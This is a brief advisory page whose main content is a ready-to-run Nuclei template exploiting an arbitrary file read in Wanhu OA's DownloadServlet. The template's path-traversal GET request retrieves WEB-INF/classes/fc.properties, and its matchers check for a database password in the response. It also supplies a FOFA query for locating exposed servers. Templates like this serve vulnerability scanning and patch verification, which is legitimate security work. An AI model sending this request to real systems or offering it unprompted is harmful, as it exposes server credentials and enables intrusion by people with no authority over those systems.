漏洞描述
There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.
wanhuoa-downloadservlet-lfi: Wanhu OA DownloadServlet - Remote File Disclosure
PoC代码[已公开]
id: wanhuoa-downloadservlet-lfi
info:
name: Wanhu OA DownloadServlet - Remote File Disclosure
author: wpsec
severity: high
description: |
There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: app="万户网络-ezOFFICE"
tags: oa,wanhu,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body,'ccerp.password')"
- "contains(header,'application/x-msdownload')"
condition: and
# digest: 4b0a004830460221009709e656e9209fff94caef5984ca58e1cc3b3ff1209f3cd8b4285278866f713d022100ac2040d4e368df8a9d71550e126ab6a2d765dac07af9e019664300ae0967fb42:922c64590222798bb761d5b6d8e72950